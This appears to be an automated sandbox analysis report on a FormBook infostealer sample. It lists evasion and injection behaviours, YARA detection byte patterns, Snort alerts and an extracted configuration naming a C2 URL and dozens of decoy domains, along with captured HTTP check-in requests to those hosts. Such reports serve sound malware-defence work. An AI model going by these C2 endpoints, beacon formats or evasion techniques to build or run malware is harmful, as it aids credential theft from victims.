Loading ...

Play interactive tourEdit tour

Analysis Report 8sxgohtHjM.exe

Overview

General Information

Sample Name:8sxgohtHjM.exe
Analysis ID:383831
MD5:d381b0a2268051aa83b031ddc87ee7df
SHA1:7c580bde96219de369ad1503d62703e77c4c3fa6
SHA256:da51c0642c1d22815991ec7f4da9f27206352ee2c5419d29af09cb69688b0b47
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 8sxgohtHjM.exe (PID: 6752 cmdline: 'C:\Users\user\Desktop\8sxgohtHjM.exe' MD5: D381B0A2268051AA83B031DDC87EE7DF)
    • 8sxgohtHjM.exe (PID: 7100 cmdline: C:\Users\user\Desktop\8sxgohtHjM.exe MD5: D381B0A2268051AA83B031DDC87EE7DF)
    • 8sxgohtHjM.exe (PID: 7108 cmdline: C:\Users\user\Desktop\8sxgohtHjM.exe MD5: D381B0A2268051AA83B031DDC87EE7DF)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 6656 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.paintersdistrictcouncil.com/vu9b/"], "decoy": ["longdoggy.net", "gylvs.com", "evonnemccray.com", "nicemoneymaker.com", "baby-schutzen.com", "xgahovzm.icu", "psdcompany.com", "makeupjunkiewholesale.com", "vz357.com", "carshownet.com", "forneyus.com", "nfoptic.com", "lampacosmetiques.com", "newmandu.com", "localupdate.net", "theartofmajur1.com", "bancosecurity.website", "cabinhealthy.com", "tiprent.com", "lloydwellsandassociates.com", "cekaventure.com", "nahomredda.com", "transitionmonster.com", "apiquet.com", "covidbizdisaster.com", "darrelbrodkemd.com", "sproutsocialleads.com", "curtex.info", "wsilhavy.net", "regaltire.net", "sellbulkweed.com", "trumedenroll.com", "pone2.com", "jedinomad.net", "sleekandshinebeauty.com", "sango-style.com", "bjshuangtai.net", "shopasadesigns.com", "siloamtree.com", "happilyeverhughes.net", "hayalpresst.com", "wfdrc.icu", "astronumerolan.com", "pvplearing.net", "moyoujf.com", "bestwishesforyou.online", "3erkala.xyz", "calificatucasa.com", "cuple.info", "k-acad.com", "iesco.net", "investmentresourcesaz.com", "4018398.com", "cbluedotpanowdbuy.com", "lllll0.com", "plainsteelforsale.com", "abarrotesflorita.com", "tunemovie.website", "dfendglobal.com", "drvincewoodonline.com", "support-applela.com", "unclejoeandkamala2020.com", "frrin.com", "pennsylvaniapot.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.8sxgohtHjM.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.8sxgohtHjM.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.8sxgohtHjM.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        4.2.8sxgohtHjM.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.8sxgohtHjM.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.support-applela.com/vu9b/?0pn=31nFjjjg4oAcb4MokEeAvira URL Cloud: Label: phishing
          Found malware configurationShow sources
          Source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.paintersdistrictcouncil.com/vu9b/"], "decoy": ["longdoggy.net", "gylvs.com", "evonnemccray.com", "nicemoneymaker.com", "baby-schutzen.com", "xgahovzm.icu", "psdcompany.com", "makeupjunkiewholesale.com", "vz357.com", "carshownet.com", "forneyus.com", "nfoptic.com", "lampacosmetiques.com", "newmandu.com", "localupdate.net", "theartofmajur1.com", "bancosecurity.website", "cabinhealthy.com", "tiprent.com", "lloydwellsandassociates.com", "cekaventure.com", "nahomredda.com", "transitionmonster.com", "apiquet.com", "covidbizdisaster.com", "darrelbrodkemd.com", "sproutsocialleads.com", "curtex.info", "wsilhavy.net", "regaltire.net", "sellbulkweed.com", "trumedenroll.com", "pone2.com", "jedinomad.net", "sleekandshinebeauty.com", "sango-style.com", "bjshuangtai.net", "shopasadesigns.com", "siloamtree.com", "happilyeverhughes.net", "hayalpresst.com", "wfdrc.icu", "astronumerolan.com", "pvplearing.net", "moyoujf.com", "bestwishesforyou.online", "3erkala.xyz", "calificatucasa.com", "cuple.info", "k-acad.com", "iesco.net", "investmentresourcesaz.com", "4018398.com", "cbluedotpanowdbuy.com", "lllll0.com", "plainsteelforsale.com", "abarrotesflorita.com", "tunemovie.website", "dfendglobal.com", "drvincewoodonline.com", "support-applela.com", "unclejoeandkamala2020.com", "frrin.com", "pennsylvaniapot.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 8sxgohtHjM.exeVirustotal: Detection: 34%Perma Link
          Source: 8sxgohtHjM.exeReversingLabs: Detection: 33%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.310623101.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.521004557.0000000003570000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.311156911.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.518608127.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.8sxgohtHjM.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.8sxgohtHjM.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 8sxgohtHjM.exeJoe Sandbox ML: detected
          Source: 4.2.8sxgohtHjM.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8sxgohtHjM.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 8sxgohtHjM.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: 8sxgohtHjM.exe, 00000004.00000002.311207883.0000000001090000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.298573010.000000000E1C0000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: 8sxgohtHjM.exe, 00000004.00000002.311207883.0000000001090000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8sxgohtHjM.exe, 00000004.00000002.311350228.000000000128F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000010.00000002.521855164.0000000003AF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 8sxgohtHjM.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.298573010.000000000E1C0000.00000002.00000001.sdmp

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 108.128.238.226:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 108.128.238.226:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 108.128.238.226:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.paintersdistrictcouncil.com/vu9b/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /vu9b/?uZQL2=D48x&0pn=epJyvIJN9OiI2pb9nHYNHIQUuRpQuBcV3xjjobJny1KcYNO6WcXhtFEWRhmWC8oG0KHq HTTP/1.1Host: www.nahomredda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?0pn=TnflO2yLdbi4Ns0f55IiNebWCRsDsubrkj3vpv5xkUkHd7zC3bp6KG+yVlLNRE0xHemI&uZQL2=D48x HTTP/1.1Host: www.nfoptic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?uZQL2=D48x&0pn=4FRBZlZfmJP1ouB3qG1kZTmIcoiAlBFvqheXtdIBznGFOOcTf1arb+p8J++3khIBMjQo HTTP/1.1Host: www.pone2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?0pn=gvDMKnL2DiygUqkLOW8equ0SBtiZsQsp9RF77GdE0oWtaZL2dcC9ipMcSo2LbyxlKRwH&uZQL2=D48x HTTP/1.1Host: www.newmandu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?uZQL2=D48x&0pn=Ucm1yDKmPu3sqYnPT23C7jNgC5pC+S3WITJgysPBW6tpfdLYpWyQ+yZVED0YNT4HHiqT HTTP/1.1Host: www.bestwishesforyou.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?0pn=ZRZicPUHGdpu447/ToshtXbk+LjFT6TcRbqWThirrcjgIxqMd1CJhqCrqkTzpGUGM9/e&uZQL2=D48x HTTP/1.1Host: www.unclejoeandkamala2020.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?uZQL2=D48x&0pn=XOyfHYtLU1lLdZnaXZe4OvPQMiRanaHMlAIcsSmWFWkLxOIqqTB9rasY28K6kY36/QRI HTTP/1.1Host: www.siloamtree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 208.91.197.91 208.91.197.91
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: global trafficHTTP traffic detected: GET /vu9b/?uZQL2=D48x&0pn=epJyvIJN9OiI2pb9nHYNHIQUuRpQuBcV3xjjobJny1KcYNO6WcXhtFEWRhmWC8oG0KHq HTTP/1.1Host: www.nahomredda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?0pn=TnflO2yLdbi4Ns0f55IiNebWCRsDsubrkj3vpv5xkUkHd7zC3bp6KG+yVlLNRE0xHemI&uZQL2=D48x HTTP/1.1Host: www.nfoptic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?uZQL2=D48x&0pn=4FRBZlZfmJP1ouB3qG1kZTmIcoiAlBFvqheXtdIBznGFOOcTf1arb+p8J++3khIBMjQo HTTP/1.1Host: www.pone2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?0pn=gvDMKnL2DiygUqkLOW8equ0SBtiZsQsp9RF77GdE0oWtaZL2dcC9ipMcSo2LbyxlKRwH&uZQL2=D48x HTTP/1.1Host: www.newmandu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?uZQL2=D48x&0pn=Ucm1yDKmPu3sqYnPT23C7jNgC5pC+S3WITJgysPBW6tpfdLYpWyQ+yZVED0YNT4HHiqT HTTP/1.1Host: www.bestwishesforyou.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?0pn=ZRZicPUHGdpu447/ToshtXbk+LjFT6TcRbqWThirrcjgIxqMd1CJhqCrqkTzpGUGM9/e&uZQL2=D48x HTTP/1.1Host: www.unclejoeandkamala2020.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vu9b/?uZQL2=D48x&0pn=XOyfHYtLU1lLdZnaXZe4OvPQMiRanaHMlAIcsSmWFWkLxOIqqTB9rasY28K6kY36/QRI HTTP/1.1Host: www.siloamtree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.nahomredda.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 08:49:51 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: explorer.exe, 00000005.00000000.294740865.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 8sxgohtHjM.exe, 00000000.00000002.270731871.0000000002701000.00000004.00000001.sdmp, 8sxgohtHjM.exe, 00000000.00000002.270751775.000000000271E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 8sxgohtHjM.exe, 00000000.00000002.270751775.000000000271E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: NETSTAT.EXE, 00000010.00000002.522730869.00000000041A2000.00000004.00000001.sdmpString found in binary or memory: http://www.newmandu.com/?fp=teRCGBRWnsMyQPYBLQzITP%2FRZhRM%2BzRVkHY6lKODoxW9UBFBZ%2BAUTjJBDU4IosgaQp
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: NETSTAT.EXE, 00000010.00000002.521546345.00000000036FA000.00000004.00000020.sdmpString found in binary or memory: http://www.support-applela.com/vu9b/?0pn=31nFjjjg4oAcb4MokEe
          Source: explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 8sxgohtHjM.exe, 00000000.00000002.274767057.0000000005840000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.294908014.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: 8sxgohtHjM.exeString found in binary or memory: https://www.gnu.org
          Source: 8sxgohtHjM.exeString found in binary or memory: https://www.gnu.org/licenses/

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.310623101.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.521004557.0000000003570000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.311156911.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.518608127.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.8sxgohtHjM.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.8sxgohtHjM.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
